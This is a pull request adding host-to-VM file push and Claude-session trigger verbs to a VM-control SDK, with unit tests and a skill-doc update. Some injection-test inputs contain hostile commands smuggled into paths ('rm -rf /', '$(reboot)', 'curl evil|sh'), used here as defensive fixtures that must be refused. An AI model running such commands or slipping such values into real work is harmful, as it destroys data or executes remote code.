### PR TITLE
feat(vm): [HIMMEL-835] host->VM claude-session trigger seam (SSH via vmsdk)

### DIFF
--- a/marketplace/plugins/himmel-ops/skills/vm/SKILL.md
+++ b/marketplace/plugins/himmel-ops/skills/vm/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: vm
-description: Use when bringing up, stopping, snapshotting, provisioning, or running e2e probes against the himmel test VMs (ubuntu_new / win11_base_himmel). Trigger on "start/stop/snapshot a VM", "run the VM e2e", "provision the VM", or "/vm". Front door to the central VM-control SDK (scripts/lib/vmsdk.py, HIMMEL-491/493).
+description: Use when bringing up, stopping, snapshotting, provisioning, running e2e probes against, or triggering/arming a claude session ON the himmel test VMs (ubuntu_new / win11_base_himmel). Trigger on "start/stop/snapshot a VM", "run the VM e2e", "provision the VM", "trigger/arm a session on the VM", or "/vm". Front door to the central VM-control SDK (scripts/lib/vmsdk.py, HIMMEL-491/493/835).
 ---
 
 # vm — VM lifecycle + e2e runbook (HIMMEL-491/493)
@@ -37,7 +37,7 @@ python scripts/lib/vmsdk.py <vm> <verb>
 Full usage line from the script:
 
 ```
-usage: vmsdk.py <vm> <up|down|snapshot NAME|restore NAME|baseline NAME|clone [REF]|provision|e2e>
+usage: vmsdk.py <vm> <up|down|snapshot NAME|restore NAME|baseline NAME|clone [REF]|provision|e2e|push FILE [DEST]|trigger HANDOVER [--at TIME] [--cwd DIR] [--timeout N]>
 ```
 
 | Verb | What it does |
@@ -50,6 +50,8 @@ usage: vmsdk.py <vm> <up|down|snapshot NAME|restore NAME|baseline NAME|clone [RE
 | `clone [REF]` | Shallow-clone the private himmel repo onto the guest (`REF` defaults to `main`) |
 | `provision` | Run the per-OS provisioner (`ubuntu-vm-setup.py` or `windows-vm-setup.py`) |
 | `e2e` | Run the install/uninstall symmetry e2e against an Ubuntu VM (delegates to `scripts/test-install-symmetry-vm.sh`) |
+| `push FILE [DEST]` | Copy one host file to the guest via SFTP (`DEST` defaults to `~/handover-inbox/<name>`; `.env*` files refused) |
+| `trigger HANDOVER [--at TIME] [--cwd DIR] [--timeout N]` | Fire a claude session ON the guest from a host handover file (HIMMEL-835): pushes the handover, then either drives an immediate bounded session (default) or, with `--at`, arms the guest's own `arm-resume.sh` (at/atd backend). `--cwd` defaults to `~/Documents/github/himmel-private` (the ubuntu_new layout, verified 2026-07-09). Single-writer: do not trigger a ticket another writer owns |
 
 **All invocations must be from the primary checkout** (not a worktree) — the
 SDK resolves `.env` via `git rev-parse --git-common-dir`; worktrees lack `.env`.

--- a/scripts/lib/test-vmsdk.py
+++ b/scripts/lib/test-vmsdk.py
@@ -6,6 +6,7 @@ Hermetic tests mock `vbox` and the SSH client, so they run on any box. The
 failed) when ubuntu_new is not up on 127.0.0.1:2222.
 """
 import os
+import socket
 import sys
 import unittest
 from pathlib import Path
@@ -698,6 +699,373 @@ class TestDriveClaude(unittest.TestCase):
             rc, out = vm.drive_claude("run something", cwd="~/vault")
         self.assertEqual(rc, 124)
         self.assertIn("Killed", out)
+
+
+class TestPushFile(unittest.TestCase):
+    def setUp(self):
+        import tempfile
+        self.tmp = tempfile.mkdtemp()
+        self.addCleanup(lambda: __import__("shutil").rmtree(self.tmp, ignore_errors=True))
+        self.local = Path(self.tmp) / "h.md"
+        self.local.write_text("# handover\n")
+
+    def _vm(self):
+        with mock.patch.dict(os.environ,
+                             {"ubuntu_vm_user": "osboxes", "ubuntu_vm_pass": "pw"}, clear=False):
+            with mock.patch.object(vmsdk, "_load_dotenv_into_env"):
+                return vmsdk.VM("ubuntu_new")
+
+    class _FakeSFTP:
+        """Records putfo/posix_rename calls; can be told to raise mid-upload."""
+        def __init__(self, putfo_exc=None):
+            self.putfo_calls = []
+            self.rename_calls = []
+            self.closed = False
+            self._putfo_exc = putfo_exc
+        def putfo(self, fobj, remote):
+            if self._putfo_exc is not None:
+                raise self._putfo_exc
+            self.putfo_calls.append((fobj.read(), remote))
+        def posix_rename(self, src, dst):
+            self.rename_calls.append((src, dst))
+        def close(self):
+            self.closed = True
+
+    def _fake_client(self, sftp):
+        class _FakeClient:
+            def open_sftp(_self):
+                return sftp
+        return _FakeClient()
+
+    def test_happy_path_resolves_tilde_and_uploads_via_tmp_rename(self):
+        vm = self._vm()
+        sftp = self._FakeSFTP()
+        cmds = []
+        def fake_run(cmd, **kw):
+            cmds.append(cmd)
+            return (0, "/home/u/handover-inbox\n")
+        with mock.patch.object(vm, "run", side_effect=fake_run), \
+             mock.patch.object(vm, "ssh", return_value=self._fake_client(sftp)):
+            result = vm.push_file(str(self.local), "~/handover-inbox/h.md")
+        self.assertEqual(result, "/home/u/handover-inbox/h.md")
+        self.assertIn("mkdir -p ~/handover-inbox", cmds[0])
+        # Uploaded bytes match the local file, but land at a TEMP name first...
+        self.assertEqual(len(sftp.putfo_calls), 1)
+        uploaded_bytes, tmp_remote = sftp.putfo_calls[0]
+        self.assertEqual(uploaded_bytes, self.local.read_bytes())
+        self.assertNotEqual(tmp_remote, "/home/u/handover-inbox/h.md")
+        # ...then posix_rename'd into place: rename target = final path.
+        self.assertEqual(len(sftp.rename_calls), 1)
+        rename_src, rename_dst = sftp.rename_calls[0]
+        self.assertEqual(rename_src, tmp_remote)
+        self.assertEqual(rename_dst, "/home/u/handover-inbox/h.md")
+
+    def test_upload_failure_raises_vmerror_and_still_closes_sftp(self):
+        """A mid-putfo failure (e.g. a dropped connection) must surface as a
+        clean VMError, and the sftp handle must still be closed (finally)."""
+        vm = self._vm()
+        sftp = self._FakeSFTP(putfo_exc=OSError("connection reset"))
+        def fake_run(cmd, **kw):
+            return (0, "/home/u/handover-inbox\n")
+        with mock.patch.object(vm, "run", side_effect=fake_run), \
+             mock.patch.object(vm, "ssh", return_value=self._fake_client(sftp)):
+            with self.assertRaises(vmsdk.VMError):
+                vm.push_file(str(self.local), "~/handover-inbox/h.md")
+        self.assertTrue(sftp.closed)
+
+    def test_skip_if_exists_skips_upload_when_final_path_present(self):
+        """Same-digest retry (skip_if_exists=True): the final path already
+        exists on the guest -> no upload/rename happens at all, removing the
+        rewrite window on a file an already-armed job may be reading."""
+        vm = self._vm()
+        sftp = self._FakeSFTP()
+        run_calls = []
+        def fake_run(cmd, **kw):
+            run_calls.append(cmd)
+            if cmd.startswith("test -f"):
+                return (0, "")   # exists
+            return (0, "/home/u/handover-inbox\n")
+        with mock.patch.object(vm, "run", side_effect=fake_run), \
+             mock.patch.object(vm, "ssh", return_value=self._fake_client(sftp)):
+            result = vm.push_file(str(self.local), "~/handover-inbox/h.md",
+                                  data=b"content", skip_if_exists=True)
+        self.assertEqual(result, "/home/u/handover-inbox/h.md")
+        self.assertEqual(sftp.putfo_calls, [])
+        self.assertEqual(sftp.rename_calls, [])
+        self.assertTrue(any(c.startswith("test -f") for c in run_calls))
+
+    def test_skip_if_exists_uploads_when_final_path_absent(self):
+        vm = self._vm()
+        sftp = self._FakeSFTP()
+        def fake_run(cmd, **kw):
+            if cmd.startswith("test -f"):
+                return (1, "")   # absent
+            return (0, "/home/u/handover-inbox\n")
+        with mock.patch.object(vm, "run", side_effect=fake_run), \
+             mock.patch.object(vm, "ssh", return_value=self._fake_client(sftp)):
+            result = vm.push_file(str(self.local), "~/handover-inbox/h.md",
+                                  data=b"content", skip_if_exists=True)
+        self.assertEqual(result, "/home/u/handover-inbox/h.md")
+        self.assertEqual(len(sftp.putfo_calls), 1)
+        self.assertEqual(len(sftp.rename_calls), 1)
+
+    def test_missing_local_raises(self):
+        vm = self._vm()
+        with self.assertRaises(vmsdk.VMError):
+            vm.push_file(str(Path(self.tmp) / "absent.md"), "~/x/absent.md")
+
+    def test_env_basename_refused(self):
+        """VM creds + PAT live in .env — it must never be pushed to the guest."""
+        vm = self._vm()
+        envfile = Path(self.tmp) / ".env"
+        envfile.write_text("secret=1\n")
+        with self.assertRaises(vmsdk.VMError) as cm:
+            vm.push_file(str(envfile), "~/x/.env")
+        self.assertIn(".env", str(cm.exception))
+
+    def test_mkdir_failure_raises(self):
+        vm = self._vm()
+        with mock.patch.object(vm, "run", return_value=(1, "read-only fs")):
+            with self.assertRaises(vmsdk.VMError):
+                vm.push_file(str(self.local), "~/x/h.md")
+
+    def test_shell_metacharacters_in_remote_refused(self):
+        """remote is interpolated unquoted (guest ~ expansion) — charset-
+        validate so a crafted destination cannot inject guest commands."""
+        vm = self._vm()
+        for evil in ("~/x; rm -rf /", "~/x/$(reboot)", "~/x/`id`", "~/x/a b"):
+            with mock.patch.object(vm, "run") as r:
+                with self.assertRaises(vmsdk.VMError):
+                    vm.push_file(str(self.local), evil)
+                r.assert_not_called()  # refused BEFORE any guest command runs
+
+
+class TestTriggerClaude(unittest.TestCase):
+    def setUp(self):
+        import tempfile
+        self.tmp = tempfile.mkdtemp()
+        self.addCleanup(lambda: __import__("shutil").rmtree(self.tmp, ignore_errors=True))
+        self.local = Path(self.tmp) / "next-session-1.md"
+        self.local.write_text("# handover\n")
+
+    def _vm(self):
+        with mock.patch.dict(os.environ,
+                             {"ubuntu_vm_user": "osboxes", "ubuntu_vm_pass": "pw"}, clear=False):
+            with mock.patch.object(vmsdk, "_load_dotenv_into_env"):
+                return vmsdk.VM("ubuntu_new")
+
+    def _expected_remote(self, local, inbox="~/handover-inbox"):
+        """Mirror trigger_claude's immutable collision-resistant inbox naming."""
+        import hashlib
+        src = Path(local).resolve()
+        tag = hashlib.sha1(str(src).encode()).hexdigest()[:8]
+        digest = hashlib.sha1(src.read_bytes()).hexdigest()[:8]
+        return f"{inbox}/{tag}-{digest}-{src.name}"
+
+    def test_immediate_drives_claude_with_guest_handover_path(self):
+        vm = self._vm()
+        guest = "/home/u/handover-inbox/next-session-1.md"
+        with mock.patch.object(vm, "push_file", return_value=guest) as pf, \
+             mock.patch.object(vm, "drive_claude", return_value=(0, "done")) as dc:
+            rc, out = vm.trigger_claude(str(self.local))
+        self.assertEqual((rc, out), (0, "done"))
+        pf.assert_called_once_with(str(self.local),
+                                   self._expected_remote(self.local),
+                                   data=self.local.read_bytes(), skip_if_exists=True)
+        prompt = dc.call_args[0][0]
+        self.assertIn(guest, prompt)
+        self.assertEqual(dc.call_args.kwargs.get("cwd"),
+                         "~/Documents/github/himmel-private")
+
+    def test_same_basename_different_sources_distinct_guest_paths(self):
+        """codex-adv CR: next-session-N.md exists in many buckets — two
+        different host handovers must never map to the same inbox path."""
+        vm = self._vm()
+        other_dir = Path(self.tmp) / "other-bucket"
+        other_dir.mkdir()
+        other = other_dir / self.local.name   # SAME basename, different source
+        other.write_text("# other handover\n")
+        remotes = []
+        def fake_push(local, remote, **kw):
+            remotes.append(remote)
+            return f"/home/u/{remote.lstrip('~/')}"
+        with mock.patch.object(vm, "push_file", side_effect=fake_push), \
+             mock.patch.object(vm, "drive_claude", return_value=(0, "ok")):
+            vm.trigger_claude(str(self.local))
+            vm.trigger_claude(str(other))
+        self.assertEqual(len(remotes), 2)
+        self.assertNotEqual(remotes[0], remotes[1])
+        for r in remotes:
+            self.assertTrue(r.endswith(f"-{self.local.name}"))
+
+    def test_edited_content_never_mutates_queued_delivery(self):
+        """codex-adv CR round 2: a retry with EDITED content must target a NEW
+        guest path — the file an already-armed job points at is immutable.
+        Same content retries hit the same path (idempotent, byte-identical)."""
+        vm = self._vm()
+        remotes = []
+        def fake_push(local, remote, **kw):
+            remotes.append(remote)
+            return f"/home/u/{remote.lstrip('~/')}"
+        with mock.patch.object(vm, "push_file", side_effect=fake_push), \
+             mock.patch.object(vm, "run", return_value=(0, "armed")):
+            vm.trigger_claude(str(self.local), when="22:30")
+            vm.trigger_claude(str(self.local), when="22:30")   # same content
+            self.local.write_text("# handover EDITED\n")
+            vm.trigger_claude(str(self.local), when="23:30")   # edited content
+        self.assertEqual(remotes[0], remotes[1])       # idempotent retry
+        self.assertNotEqual(remotes[0], remotes[2])    # edit -> new path
+
+    def test_immediate_passes_timeout_and_cwd(self):
+        vm = self._vm()
+        with mock.patch.object(vm, "push_file", return_value="/h/x.md"), \
+             mock.patch.object(vm, "drive_claude", return_value=(124, "Killed")) as dc:
+            rc, out = vm.trigger_claude(str(self.local), cwd="~/himmel", timeout=42)
+        self.assertEqual(rc, 124)  # timeout kill passes through, not raised
+        self.assertEqual(dc.call_args.kwargs.get("timeout"), 42)
+        self.assertEqual(dc.call_args.kwargs.get("cwd"), "~/himmel")
+
+    def test_scheduled_arms_via_guest_arm_resume(self):
+        vm = self._vm()
+        cmds = []
+        def fake_run(cmd, **kw):
+            cmds.append(cmd)
+            return (0, "armed")
+        with mock.patch.object(vm, "push_file",
+                               return_value="/home/u/handover-inbox/next-session-1.md"), \
+             mock.patch.object(vm, "run", side_effect=fake_run):
+            rc, out = vm.trigger_claude(str(self.local), when="22:30")
+        self.assertEqual(rc, 0)
+        joined = "\n".join(cmds)
+        self.assertIn("arm-resume.sh", joined)          # never a hand-rolled scheduler
+        self.assertIn("--time 22:30", joined)
+        self.assertIn("--handover /home/u/handover-inbox/next-session-1.md", joined)
+        # codex-adv CR: no --force — arm-resume's dedup/collision checks must
+        # stay live so a re-trigger cannot silently replace a pending job.
+        self.assertNotIn("--force", joined)
+
+    def test_scheduled_without_cwd_omits_cwd_flag(self):
+        """HIMMEL-835 CR finding 1: no explicit cwd -> --cwd must be ABSENT so
+        arm-resume.sh's own priority (--cwd > resume_cwd: frontmatter >
+        auto-detect) runs, instead of an implicit default silently overriding
+        resume_cwd: / hard-failing a resume_worktree: handover (--cwd and
+        --worktree are mutually exclusive in arm-resume.sh). The default
+        checkout is still used to LOCATE arm-resume.sh (a separate concern)."""
+        vm = self._vm()
+        cmds = []
+        def fake_run(cmd, **kw):
+            cmds.append(cmd)
+            return (0, "armed")
+        with mock.patch.object(vm, "push_file",
+                               return_value="/home/u/handover-inbox/next-session-1.md"), \
+             mock.patch.object(vm, "run", side_effect=fake_run):
+            vm.trigger_claude(str(self.local), when="22:30")
+        joined = "\n".join(cmds)
+        self.assertIn("cd ~/Documents/github/himmel-private", joined)
+        self.assertNotIn("--cwd", joined)
+
+    def test_scheduled_with_explicit_cwd_includes_cwd_flag(self):
+        vm = self._vm()
+        cmds = []
+        def fake_run(cmd, **kw):
+            cmds.append(cmd)
+            return (0, "armed")
+        with mock.patch.object(vm, "push_file",
+                               return_value="/home/u/handover-inbox/next-session-1.md"), \
+             mock.patch.object(vm, "run", side_effect=fake_run):
+            vm.trigger_claude(str(self.local), when="22:30", cwd="~/himmel")
+        joined = "\n".join(cmds)
+        self.assertIn("cd ~/himmel", joined)
+        self.assertIn("--cwd ~/himmel", joined)
+
+    def test_scheduled_arm_failure_raises(self):
+        vm = self._vm()
+        with mock.patch.object(vm, "push_file", return_value="/h/x.md"), \
+             mock.patch.object(vm, "run", return_value=(1, "at: no atd running")):
+            with self.assertRaises(vmsdk.VMError) as cm:
+                vm.trigger_claude(str(self.local), when="22:30")
+        self.assertIn("arm-resume", str(cm.exception))
+
+    def test_scheduled_arm_run_exception_wrapped_as_vmerror(self):
+        """HIMMEL-835 CR finding 4: a raw exception from self.run (e.g. a
+        socket timeout) during the arm-resume call must surface as a clean
+        VMError, not a raw traceback from the new CLI verb."""
+        vm = self._vm()
+        with mock.patch.object(vm, "push_file", return_value="/h/x.md"), \
+             mock.patch.object(vm, "run", side_effect=socket.timeout("timed out")):
+            with self.assertRaises(vmsdk.VMError):
+                vm.trigger_claude(str(self.local), when="22:30")
+
+    def test_missing_handover_raises_vmerror_not_raw_exception(self):
+        """HIMMEL-835 CR finding 3: Path(...).resolve() does not require
+        existence — the hoisted is_file() check must raise a clean VMError
+        before the digest read, not a raw FileNotFoundError, and push_file
+        must never be reached."""
+        vm = self._vm()
+        missing = str(Path(self.tmp) / "absent.md")
+        with mock.patch.object(vm, "push_file") as pf:
+            with self.assertRaises(vmsdk.VMError) as cm:
+                vm.trigger_claude(missing)
+            pf.assert_not_called()
+        self.assertIn("not found", str(cm.exception))
+
+    def test_shell_metacharacters_in_cwd_refused(self):
+        """cwd is interpolated unquoted into guest cd commands — charset-
+        validate so a crafted cwd cannot inject guest commands."""
+        vm = self._vm()
+        for evil in ("~/repo; curl evil|sh", "$(id)", "~/a b"):
+            with mock.patch.object(vm, "push_file") as pf, \
+                 mock.patch.object(vm, "run") as r:
+                with self.assertRaises(vmsdk.VMError):
+                    vm.trigger_claude(str(self.local), cwd=evil)
+                pf.assert_not_called()  # refused before the handover is pushed
+                r.assert_not_called()
+
+
+class TestTriggerCLI(unittest.TestCase):
+    def _env(self):
+        return mock.patch.dict(os.environ,
+                               {"ubuntu_vm_user": "u", "ubuntu_vm_pass": "p"}, clear=False)
+
+    def test_trigger_parses_at_cwd_timeout(self):
+        with self._env(), mock.patch.object(vmsdk, "_load_dotenv_into_env"), \
+             mock.patch.object(vmsdk.VM, "trigger_claude",
+                               return_value=(0, "armed")) as t:
+            rc = vmsdk.main(["ubuntu_new", "trigger", "h.md",
+                             "--at", "22:30", "--cwd", "~/himmel", "--timeout", "60"])
+        self.assertEqual(rc, 0)
+        t.assert_called_once_with("h.md", when="22:30", cwd="~/himmel", timeout=60)
+
+    def test_trigger_propagates_drive_rc(self):
+        with self._env(), mock.patch.object(vmsdk, "_load_dotenv_into_env"), \
+             mock.patch.object(vmsdk.VM, "trigger_claude", return_value=(124, "Killed")):
+            rc = vmsdk.main(["ubuntu_new", "trigger", "h.md"])
+        self.assertEqual(rc, 124)
+
+    def test_trigger_unknown_flag_exit_2(self):
+        with self._env(), mock.patch.object(vmsdk, "_load_dotenv_into_env"):
+            rc = vmsdk.main(["ubuntu_new", "trigger", "h.md", "--bogus", "x"])
+        self.assertEqual(rc, 2)
+
+    def test_trigger_missing_flag_value_exit_2(self):
+        with self._env(), mock.patch.object(vmsdk, "_load_dotenv_into_env"):
+            rc = vmsdk.main(["ubuntu_new", "trigger", "h.md", "--at"])
+        self.assertEqual(rc, 2)
+
+    def test_trigger_environment_error_exit_1(self):
+        with self._env(), mock.patch.object(vmsdk, "_load_dotenv_into_env"), \
+             mock.patch.object(vmsdk.VM, "trigger_claude",
+                               side_effect=EnvironmentError("claude not found on guest")):
+            rc = vmsdk.main(["ubuntu_new", "trigger", "h.md"])
+        self.assertEqual(rc, 1)
+
+    def test_push_prints_absolute_remote(self):
+        with self._env(), mock.patch.object(vmsdk, "_load_dotenv_into_env"), \
+             mock.patch.object(vmsdk.VM, "push_file",
+                               return_value="/home/u/handover-inbox/h.md") as p:
+            rc = vmsdk.main(["ubuntu_new", "push", "h.md"])
+        self.assertEqual(rc, 0)
+        p.assert_called_once_with("h.md", "~/handover-inbox/h.md")
 
 
 def _ubuntu_up():

--- a/scripts/lib/vmsdk.py
+++ b/scripts/lib/vmsdk.py
@@ -10,8 +10,12 @@ no new deps). Loopback-only. Reads SSH creds from the PRIMARY checkout's .env
 parent of `git rev-parse --git-common-dir`, matching scripts/lib/load-dotenv.sh).
 
 CLI: python scripts/lib/vmsdk.py <vm> <up|down|snapshot NAME|restore NAME|
-                                      baseline NAME|clone [REF]|provision|e2e>
+                                      baseline NAME|clone [REF]|provision|e2e|
+                                      push FILE [DEST]|
+                                      trigger HANDOVER [--at TIME] [--cwd DIR] [--timeout N]>
 """
+import hashlib
+import io
 import json
 import os
 import re
@@ -19,6 +23,7 @@ import shlex
 import socket
 import subprocess
 import sys
+import uuid
 from pathlib import Path
 
 sys.path.insert(0, str(Path(__file__).resolve().parent))
@@ -348,6 +353,177 @@ class VM:
         outer = f"timeout --signal=KILL {timeout} bash -lc {shlex.quote(inner)}"
         return self.run(outer)
 
+    @staticmethod
+    def _safe_guest_path(p, what):
+        """Charset-validate a guest path interpolated into a shell command.
+
+        Guest paths must stay unquoted so the guest shell expands `~`
+        (drive_claude's documented constraint), so injection is prevented by
+        VALIDATION instead — same pattern as clone_himmel's ref check.
+        """
+        if not re.fullmatch(r"[A-Za-z0-9._/~-]+", str(p)):
+            raise VMError(
+                f"{what} {p!r}: guest-path characters only "
+                "([A-Za-z0-9._/~-]; no spaces or shell metacharacters)")
+        return str(p)
+
+    def push_file(self, local, remote, data=None, skip_if_exists=False):
+        """Copy ONE local file (or `data` bytes) to the guest via SFTP,
+        atomically: upload to a hidden temp name in the destination dir, then
+        posix_rename() into place (mkdir -p the parent first).
+
+        Refuses `.env*` basenames — the same secrets rule sync_repo enforces
+        with tar excludes (VM creds + the GitHub PAT must never land on the
+        guest). `remote` may use `~` — the parent dir is resolved to an
+        absolute guest path first (SFTP does not expand `~`).
+
+        `data`, if given, uploads exactly those bytes instead of re-reading
+        `local` from disk — closes a TOCTOU window for callers (trigger_claude)
+        that already computed a content digest from bytes read once: without
+        this, an edit to `local` between the digest read and this call would
+        upload bytes that no longer match the digest `remote` was tagged with.
+        `local` is still used for the `.env*` basename guard and (when `data`
+        is None) the existence check.
+
+        `skip_if_exists=True` (trigger_claude's digest-addressed inbox paths
+        only — a plain `push` overwrites unconditionally) skips the upload
+        entirely when `remote` already exists on the guest: the path already
+        encodes the content digest, so same path implies same content, and
+        skipping removes the rewrite window a same-digest retry would
+        otherwise open on a file an already-armed job may be reading.
+
+        Returns the absolute remote path.
+        """
+        lp = Path(local)
+        if data is None and not lp.is_file():
+            raise VMError(f"push_file: local file not found: {local}")
+        if lp.name.startswith(".env"):
+            raise VMError("push_file: refusing to push a .env* file to the guest")
+        self._safe_guest_path(remote, "push_file: remote")
+        remote_dir, _, remote_name = str(remote).rpartition("/")
+        if not remote_dir:
+            remote_dir = "~"
+        if not remote_name:
+            remote_name = lp.name
+        try:
+            rc, out = self.run(f"mkdir -p {remote_dir} && cd {remote_dir} && pwd")
+        except Exception as e:
+            raise VMError(f"push_file: mkdir -p {remote_dir} failed on {self.name}: {e}") from e
+        if rc != 0:
+            raise VMError(
+                f"push_file: mkdir -p {remote_dir} failed on {self.name} "
+                f"(rc {rc}): {out.strip()[-200:]}")
+        absdir = out.strip().splitlines()[-1].strip()
+        absremote = f"{absdir}/{remote_name}"
+        if skip_if_exists:
+            try:
+                exists_rc, _ = self.run(f"test -f {absremote}")
+            except Exception as e:
+                raise VMError(
+                    f"push_file: existence check for {absremote} failed on {self.name}: {e}") from e
+            if exists_rc == 0:
+                return absremote
+        if data is None:
+            data = lp.read_bytes()
+        tmp_remote = f"{absdir}/.{remote_name}.tmp-{uuid.uuid4().hex[:8]}"
+        sftp = self.ssh().open_sftp()
+        try:
+            try:
+                sftp.putfo(io.BytesIO(data), tmp_remote)
+            except Exception as e:
+                raise VMError(f"push_file: upload to {self.name} failed ({tmp_remote}): {e}") from e
+            try:
+                sftp.posix_rename(tmp_remote, absremote)
+            except Exception as e:
+                raise VMError(f"push_file: rename to {absremote} failed on {self.name}: {e}") from e
+        finally:
+            sftp.close()
+        return absremote
+
+    def trigger_claude(self, handover, cwd=None,
+                       when=None, timeout=600, inbox="~/handover-inbox"):
+        """Fire a claude session ON the guest from a HOST handover file
+        (HIMMEL-835 — the host->VM session-trigger seam).
+
+        Delivers the handover via push_file, then either:
+        - when=None: drives an immediate bounded session (drive_claude, which
+          keeps the positional-prompt billing guard) whose prompt tells claude
+          to load the delivered handover; returns its (rc, out) verbatim
+          (rc 124 = guest timeout kill, caller decides).
+        - when=<time>: arms the GUEST's own scheduler through the guest
+          checkout's arm-resume.sh (Linux at/atd backend — never a hand-rolled
+          scheduler, HIMMEL-647). Raises VMError if arming fails; returns
+          (0, out) on success.
+
+        cwd=None (sentinel, codex-adv CR): the caller did NOT ask for a
+        specific resume cwd. Locating arm-resume.sh (which checkout to `cd`
+        into to find the script) is a separate concern from resume ROUTING —
+        so a default checkout is still used to find the script, but --cwd is
+        NOT passed to arm-resume.sh, letting its own priority run as designed
+        (1. --cwd, 2. resume_cwd: frontmatter, 3. auto-detect). Passing --cwd
+        unconditionally would hard-fail a resume_worktree: handover (--cwd and
+        --worktree are mutually exclusive in arm-resume.sh) and silently
+        override resume_cwd: frontmatter on every other one. Only an
+        EXPLICITLY passed cwd is forwarded as --cwd.
+
+        The guest session runs on the guest's own claude login (its own quota)
+        and commits with the guest's own credentials. Single-writer stays with
+        the caller: do not trigger a ticket another writer owns.
+        """
+        locate_cwd = cwd if cwd is not None else "~/Documents/github/himmel-private"
+        self._safe_guest_path(locate_cwd, "trigger_claude: cwd")
+        src = Path(handover).resolve()
+        # Path(...).resolve() does not require existence — check explicitly so
+        # a missing handover raises a clean VMError here instead of a raw
+        # FileNotFoundError from the read_bytes() below (which would also make
+        # push_file's own is_file() check unreachable).
+        if not src.is_file():
+            raise VMError(f"trigger: handover file not found: {handover}")
+        data = src.read_bytes()
+        # Immutable, collision-resistant inbox name (codex-adv CR rounds 1+2):
+        # handovers are commonly named next-session-N.md across buckets, so a
+        # flat basename lets a later trigger overwrite an earlier delivery; and
+        # a path-only tag still lets a RETRY of the same source mutate the file
+        # an already-armed job points at, before arm-resume's dedup rejects the
+        # re-arm. Tagging with source path + CONTENT digest makes the delivered
+        # file immutable by construction: same content -> byte-identical
+        # overwrite (harmless idempotent retry); edited content -> a NEW guest
+        # path, so a queued job's file is never mutated.
+        tag = hashlib.sha1(str(src).encode()).hexdigest()[:8]
+        digest = hashlib.sha1(data).hexdigest()[:8]
+        # data=data (not re-read from disk) closes the digest/upload TOCTOU: an
+        # edit to `handover` between the read above and the upload must not
+        # desync the uploaded bytes from the digest tag. skip_if_exists=True:
+        # the digest-addressed path already encodes content, so an existing
+        # final path is skipped rather than rewritten (an armed job may be
+        # reading it).
+        guest_handover = self.push_file(
+            handover, f"{inbox}/{tag}-{digest}-{src.name}",
+            data=data, skip_if_exists=True)
+        if when is None:
+            prompt = (f"Resume from handover: load {guest_handover} and "
+                      f"execute its cold-start instructions.")
+            return self.drive_claude(prompt, cwd=locate_cwd, timeout=timeout)
+        # No --force: arm-resume's own dedup/collision checks must stay live so
+        # a re-trigger cannot silently replace another pending scheduled job
+        # (its dedup keys on the handover path, which the hash tag makes
+        # per-source; a genuine re-arm of the SAME source is the one case its
+        # same-handover dedup rejects — that refusal surfaces as a loud
+        # VMError below, operator decides).
+        arm = (f"cd {locate_cwd} && bash scripts/handover/arm-resume.sh"
+               f" --time {shlex.quote(when)}"
+               f" --handover {shlex.quote(guest_handover)}")
+        if cwd is not None:
+            arm += f" --cwd {cwd}"
+        try:
+            rc, out = self.run(f"bash -lc {shlex.quote(arm)}", timeout=120)
+        except Exception as e:
+            raise VMError(f"arm-resume on {self.name} failed: {e}") from e
+        if rc != 0:
+            raise VMError(
+                f"arm-resume on {self.name} failed (rc {rc}): {out.strip()[-300:]}")
+        return rc, out
+
     def run_e2e(self):
         if self.os != "ubuntu":
             raise NotImplementedError(
@@ -375,7 +551,33 @@ class VM:
 
 
 _USAGE = ("usage: vmsdk.py <vm> "
-          "<up|down|snapshot NAME|restore NAME|baseline NAME|clone [REF]|provision|e2e>")
+          "<up|down|snapshot NAME|restore NAME|baseline NAME|clone [REF]|provision|e2e|"
+          "push FILE [DEST]|"
+          "trigger HANDOVER [--at TIME] [--cwd DIR] [--timeout N]>")
+
+
+def _parse_trigger_args(rest):
+    """Parse `trigger HANDOVER [--at TIME] [--cwd DIR] [--timeout N]`.
+
+    Returns (handover, kwargs) or raises ValueError on a malformed flag.
+    """
+    handover, opts, kw = rest[0], rest[1:], {}
+    i = 0
+    while i < len(opts):
+        flag = opts[i]
+        if i + 1 >= len(opts):
+            raise ValueError(f"missing value for {flag}")
+        val = opts[i + 1]
+        if flag == "--at":
+            kw["when"] = val
+        elif flag == "--cwd":
+            kw["cwd"] = val
+        elif flag == "--timeout":
+            kw["timeout"] = int(val)
+        else:
+            raise ValueError(f"unknown flag {flag}")
+        i += 2
+    return handover, kw
 
 
 def main(argv):
@@ -406,6 +608,19 @@ def main(argv):
             vm.provision()
         elif cmd == "e2e":
             return vm.run_e2e()
+        elif cmd == "push" and rest:
+            dest = rest[1] if len(rest) > 1 else f"~/handover-inbox/{Path(rest[0]).name}"
+            print(vm.push_file(rest[0], dest))
+        elif cmd == "trigger" and rest:
+            try:
+                handover, kw = _parse_trigger_args(rest)
+            except ValueError as e:
+                print(f"trigger: {e}", file=sys.stderr)
+                print(_USAGE, file=sys.stderr)
+                return 2
+            rc, out = vm.trigger_claude(handover, **kw)
+            print(out)
+            return rc
         else:
             print(_USAGE, file=sys.stderr)
             return 2
@@ -413,6 +628,9 @@ def main(argv):
         print(e, file=sys.stderr)
         return 4
     except VMError as e:               # operational failure of any verb
+        print(e, file=sys.stderr)
+        return 1
+    except EnvironmentError as e:      # guest-env failure (claude/cwd missing)
         print(e, file=sys.stderr)
         return 1
     return 0


### PR DESCRIPTION
Propagated from private (squash 17edec87, PR #1058 there). Host->VM claude-session trigger/orchestration seam over the existing vmsdk SSH transport; hermetic tests; /vm skill doc updated. CR: clean private /pr-check gate before merge; public branch byte-verified identical to the private squash.